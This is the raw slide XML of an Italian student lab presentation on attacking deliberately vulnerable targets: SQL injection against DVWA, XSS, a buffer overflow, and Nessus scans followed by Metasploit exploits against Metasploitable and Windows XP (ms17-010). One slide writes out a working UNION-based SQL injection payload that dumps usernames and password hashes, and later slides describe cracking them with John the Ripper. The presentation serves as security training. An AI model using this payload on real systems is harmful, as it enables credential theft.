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5" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="269" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="267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D0EE1-CAB2-469D-A94A-4EBA69C98C63}">
          <p14:sldIdLst>
            <p14:sldId id="259"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQLi" id="{2F828DB5-09B8-48B7-8B20-1F97B2DDA4C0}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS" id="{B9496061-D5BD-4B78-B47C-4D064A5A0ECC}">
          <p14:sldIdLst>
            <p14:sldId id="261"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Exploit/Metasploitable" id="{CCE3B48D-32F4-47D0-8536-8941884AD7E5}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Exploit/Win XP" id="{8CF5E3DC-0F09-49E0-B270-0091BCD3F6DB}">
          <p14:sldIdLst>
            <p14:sldId id="263"/>
            <p14:sldId id="267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7D0D-5A91-54FE-B687-5157BB46B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7901-836E-2B3A-5950-2641E2094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1265-54DC-37AF-62F8-FEE77264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F166-AE97-5D2D-1CAE-CDEB93EB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A7D8-AB2F-2314-F98F-F729E0F9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2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26C4-B050-5578-B957-DF1A981FD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652B-5CF0-448E-FBE9-7D6BB551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55B3-D285-BDED-704C-038888EC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1DB8-D6D1-93E4-8C53-D83101CF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1204-2FCE-45CC-D298-27624A93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D3CE-F94B-A881-F3E3-4416680E3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FB3F0-9164-973C-112C-3A528237E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3A16-A9ED-43D3-6190-7DEB11A4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321B-1E3C-8384-37A1-DFB093A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1DDC-BA21-D7B0-A504-3A9D0576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0506-5606-C70E-B735-F216EBE2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DB45-CEA9-04D7-633C-352B7EC8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8D8D-7D64-83E8-3385-22506BD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088E-2635-EE03-51AB-5177B6A2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C369-4D1B-7C3C-91E5-7271F2DC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C601-3820-E6F9-62AC-1D26E0D7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7312-BF61-92CA-B2AF-5DD204B8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FE1E-D088-08F7-3CF7-17E63F4C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1C0D-2BAE-DB98-538A-893EE1ED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7634-2D25-DD5D-9052-BF5FB473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150D-F787-B44B-A9F8-DC3E6709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C068-2F6D-CD88-74F5-54C1D678B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F1ED-F1AE-AB12-B630-EC179DA8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6F68-AB9C-50A1-ACBF-311BBA5B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6826-460A-3B47-C093-9C78F253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1607-90B8-1D8B-32CC-CAE9A68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FBC0-F5BE-CAEF-428A-4217D858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B15B-559C-1DCC-F09D-CC76C95F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0A34-F3FB-56AA-6473-4C9566AFD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542FE-DCCD-EBB1-9323-882E4265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96A8D-D791-2C76-3263-51B1457E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B8DE0-0C1B-5048-F709-1EC88498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E8CB3-EA8B-2E13-AE78-0556AEF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F1A6A-2BEC-F8A2-573C-3826FEBD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FEAE-A75E-5AF2-952C-7435D40C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7111D-2A97-99F0-4DE2-C0BB7CF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32CF7-C17F-8DEF-DF16-C2B48E2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31FFB-E393-050A-3528-A5A8F824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E9FB3-2779-9E1C-D212-65D5AE5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92CD-A1B4-37AF-9BD3-59C6043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E00DF-8402-E566-6AD3-EC584A9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0D73-81F5-ED83-1E12-7A4F4ABD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A5BB-CA18-2086-EC3B-2A2183B9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E3570-0E86-5988-A770-B3FF38AA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28A7B-7A95-86A3-09FC-35D29DC8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C851-1A78-A36C-6913-39598F3B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8E4CB-2B24-B227-EE48-CA41F17C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1982-DEAD-91AB-0091-7CA7BF15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0C7FA-1320-0E07-EB6A-7975C129F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337BA-B892-568D-1E1B-22BFBC79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9622B-432C-41E7-A041-1B5FCAF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6A49-3BAA-9DBA-76FC-2984DCA2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962FF-CD52-F0AC-97BD-3615B084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FCDFE-BD01-6F82-56E2-EA39DC9B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19ADA-389F-FEF1-6C76-54FFB11C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F926-7D12-1CE9-B8BA-D62280B1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D240-DA72-4D2C-BA10-265A66CD77A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6D8B-B3D5-6F50-36C2-352607DAD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C047-0579-ADBD-44B3-A8217189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8C0-FF62-483A-9F84-9A6E5EEAC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AB2A-BE42-BB98-0709-431D64D0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7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Build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D827-4054-BA74-C048-FDEC54CB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996"/>
            <a:ext cx="10515600" cy="944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200" dirty="0"/>
              <a:t>In questa settimana useremo varie tecniche di attacchi per sfruttare le vulnerabilità della nostra macchina target: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8DC8A2-292B-AEE5-9870-D1786060B479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4045109"/>
            <a:ext cx="1454063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1.   SQLi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1AC557-878D-C29C-1145-6F31CD0B630E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4518547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2.   XSS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912631-7DE3-563E-96F0-06E6DFF93AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4991985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3.   BOF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01AF0-86FA-BC5E-E428-94B6FEED7010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5465423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4.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> , exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Metasploitable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F7C44E-9923-31B6-FF5A-BA37206BAB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5938861"/>
            <a:ext cx="10515600" cy="473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5.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> , exploit Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xp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933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28274-2EF9-4E7A-81EE-2EA619986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1C501ED1-5EA9-3EE1-6BCF-EE69650B7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2" y="960157"/>
            <a:ext cx="2640708" cy="2878156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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976CE2F3-2A13-8296-6F20-F8F248953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6" y="2118547"/>
            <a:ext cx="6056218" cy="908432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0FA655C-A14A-4E97-B6FB-41150B2CC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2E69EA3-AF0D-4963-BD05-5F8D172D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CA24F386-96F7-46D9-9FB1-606B7695B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66100661-DE42-4292-8B05-19DA0FF52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562DCB34-ABBD-4664-A5E3-8D7E5CFC7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3F0D4DEA-32D7-4538-A4D7-3306B5AE3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7978524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948EA-C65A-4A94-64C0-9966D596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01" y="4267831"/>
            <a:ext cx="7409500" cy="1418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EFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Metasploitable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Metasploit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EABF5A50-8226-4F5F-936D-F759CC114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7800" y="4377267"/>
            <a:ext cx="3121152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0BED5-5F2F-6BBE-26C7-351120D3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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assicuriamoci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vittima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è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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raggiungibile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C408EE-6D02-7CEA-51DD-01300406C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05" y="242754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6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ADCA82EC-E77F-C6D4-7394-E57457C2B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11" y="756626"/>
            <a:ext cx="4622052" cy="2426575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7769EC1-334F-E8BD-7CB9-907155FEF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12" y="4038315"/>
            <a:ext cx="4622052" cy="19412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753A70-B56D-250C-9D04-7DB2D925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06" y="0"/>
            <a:ext cx="4158641" cy="2417522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2- Valutazione delle vulnerabilità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F6362F-C562-3B6C-6867-266476941A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588306" y="3145933"/>
            <a:ext cx="4158641" cy="1174984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Abbiamo eseguito una scansione delle vulnerabilità tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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nessus</a:t>
            </a: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CE82696-C0F1-0814-3A53-420C1007C318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588306" y="5049328"/>
            <a:ext cx="4158641" cy="1319411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Abbiamo eseguito un port scanning per assicurarci che la porta del servizio di nostro interesse sia aperta tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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NMAP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3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87C7A-464F-C86A-8671-7EDD989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Usando il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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cerchiamo l’exploit relativo a quella vulnerabilità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6FA3AF-967E-34D5-D558-098EE68BB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85" y="643466"/>
            <a:ext cx="513716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CDC2-1F7F-22CF-496A-5F0EE81DA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 dirty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Dopo aver scelto l’exploit e averlo impostato, l’abbiamo fatto partire creando così una shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882EA267-A858-BE7A-6CBB-09CE9822F2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" r="2549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B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28839-C020-67F1-2401-4E073109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Una volta ottenuto il controllo della macchina vittima, eseguiamo il comando ifconfig per vedere se effettivamente siamo dentro.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A54D745B-22EF-8B62-2574-96B9E4D57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78802"/>
            <a:ext cx="7638125" cy="405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7C683A5A-C226-EAB6-4A12-9979FECEA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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6442460" cy="554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470B01-40C7-BAAE-0365-512A9954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05" y="4860098"/>
            <a:ext cx="5791295" cy="1910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3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 scopo di questo attacco è sfruttare la vulnerabilità di windows XP usando Metasploit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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F475959-A235-C91B-8CE8-E84AF2471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r="2718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83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5CFE-315A-BCFF-9B7A-D1A6CE03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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t>Come sempre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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assicuriamoci che la vittima è raggiungibile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7100DCB-2D6D-4057-BD63-C3C7B62E4F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2139484"/>
            <a:ext cx="1017767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638DB-FFEC-2722-AE56-BE6726A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66" y="1"/>
            <a:ext cx="4158641" cy="2417522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r>
              <a:rPr lang="it-IT" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2- Valutazione delle vulnerabilità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4468B9-E653-06A7-93C8-14470857C1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51" y="245150"/>
            <a:ext cx="5068299" cy="3325546"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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46CD54AC-FD96-F21B-99B3-81D91A606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51" y="3733426"/>
            <a:ext cx="5181600" cy="2961844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B0FCC61-2C10-BA94-0D6C-2BED3F213158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716066" y="3145934"/>
            <a:ext cx="4158641" cy="1174984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Abbiamo eseguito una scansione delle vulnerabilità tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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193BD11-12C6-A8A2-B9EF-5E62EF1B7FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716066" y="5049329"/>
            <a:ext cx="4158641" cy="1319411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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Abbiamo eseguito un port scanning per assicurarci che la porta del servizio di nostro interesse sia aperta tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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NMAP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3C78F-E03E-B2F8-E01F-29A10302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 La fase di exploit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2252F-11E8-0429-CBD1-EBFD7043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Usando Metasploit abbiamo cercato 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exploit della vulnerabilità ms17-010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/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CC5D0E-0333-A6AC-FE7A-AA708CD2F9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59973"/>
            <a:ext cx="10917936" cy="38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B857A-AD9F-04AB-67D7-7450527A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4" y="478285"/>
            <a:ext cx="3651728" cy="39679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32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L’obiettivo è attaccare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="32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 APP della DVWA per recuperare la password in chiaro dell’utente Pablo Picasso tramite la tecnica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1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injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="32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  <a:br>
              <a:rPr lang="it-IT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it-IT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4CBCE110-8B1F-2F42-3E22-09220C0EC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8" y="1079828"/>
            <a:ext cx="7469963" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16997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84FC-E2BC-E99D-B47A-CA098690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Abbiamo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cambiato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le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opzioni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dell’exploit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 del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payload,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impostando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l’host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remoto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e la porta in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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ascolto</a:t>
            </a:r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locale.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51171D0-94E3-DAB5-B88E-B15FA22D7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2" y="2121122"/>
            <a:ext cx="10909640" cy="4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CB6EC-EF25-A947-9109-0BE77348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37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4- Lanciando l’exploit siamo riusciti ad ottenere una sessione aperta con la vittima</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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696E28F-705B-8E50-0B76-3F62212C0A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2212700"/>
            <a:ext cx="9292069" cy="77433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1387B3C-022A-31F3-7C68-6F9CD831A5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498834" y="3246120"/>
            <a:ext cx="9484410" cy="774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abbiamo provato diversi comandi per confermare la connessione.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="37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0B9C24-4851-6546-6A96-FB6BD660F4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558209" y="3995780"/>
            <a:ext cx="9484410" cy="774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37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D4518C-37E0-C6A6-93C4-8291FEC1C671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4720789"/>
            <a:ext cx="9484410" cy="774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37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32A0909-23C9-8BD8-5809-45194F0CC4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626850" y="5488984"/>
            <a:ext cx="9484410" cy="774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3700" dirty="0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FA83C2BE-9AC0-B24F-4DD8-41E54A802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6" y="3880509"/>
            <a:ext cx="4171429" cy="2714286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6FCD346-5C04-4DC8-AFA2-EF72BF77C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79" y="3880245"/>
            <a:ext cx="5486400" cy="1059037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47EEBBAC-855B-5303-2DD8-178C2CF5A3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79" y="5304118"/>
            <a:ext cx="5486400" cy="126936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FBADF06-0578-4AB8-F2CC-86C9A87620F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558209" y="2599869"/>
            <a:ext cx="8986624" cy="28141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E432-6704-9C97-3A6D-43EB4187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1- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Dobbiamo prima assicurarci che la vittima è raggiungibile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1A45AD-A523-76AB-CEBA-A0CC70D3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5" b="21658"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432225" y="2292299"/>
            <a:ext cx="11327549" cy="38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387D3-A20A-89BA-02FF-E99A3FC1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2- Eseguire l’attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sulla web app della DVWA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E43C8B-C16E-2570-6CFD-E085EDE0C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953"/>
            <a:ext cx="8115295" cy="54711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8D1B42-815A-E39E-E645-8BDE806769B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8115295" y="1590742"/>
            <a:ext cx="4076701" cy="159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0" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>Usando il codice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:latin typeface="Calibri-Italic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>%' and 1=0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>(user,0x0a,password) from users#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>‘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26CEAA-A492-318A-1BA4-F61EBA90F17C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8115294" y="3429000"/>
            <a:ext cx="4076701" cy="962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b="0" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Calibri-Italic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> Rileva l’hash della password per tutti gli utenti nella tabella degli users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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61270D-4220-B7C7-B63E-E81D00470172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204581" y="5649238"/>
            <a:ext cx="2379945" cy="349319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89D7A-B8C7-C185-3C2F-18CDD93E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3- Decifrare l’hash md5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FADD4-A6E0-E919-BBAA-26CD172CA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16646" r="46643" b="11758"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="178966" y="1928621"/>
            <a:ext cx="5131088" cy="1876096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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3C4D98A-9DDF-60DE-48EE-F05DA8A5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12" y="1928621"/>
            <a:ext cx="6375430" cy="24226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C0D549-5039-E803-DC59-CFE6FB3DEB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178966" y="4635275"/>
            <a:ext cx="5131088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0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Abbiamo creato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> un file in cui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>andiamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>associare l’utente con il suo codice hash in modo che </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>John the Ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> possa decriptare in seguito il formato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>md5.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E3386E-0E2A-FF79-4DED-69914C100115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5563311" y="4703457"/>
            <a:ext cx="5131089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avviare il tool JTR specificandone il formato del hash ed il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> del file da dove decriptare il codice. Siamo così</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>riusciti a ricavare la password in chiaro di Pablo, ovvero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="1" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri-Italic"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1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9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FE13B9-62F1-090E-00ED-B4F0A9F0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r="11998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0E1C-584F-E6A2-54D5-D16B4311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1970021"/>
            <a:ext cx="3181612" cy="327838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it-IT" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
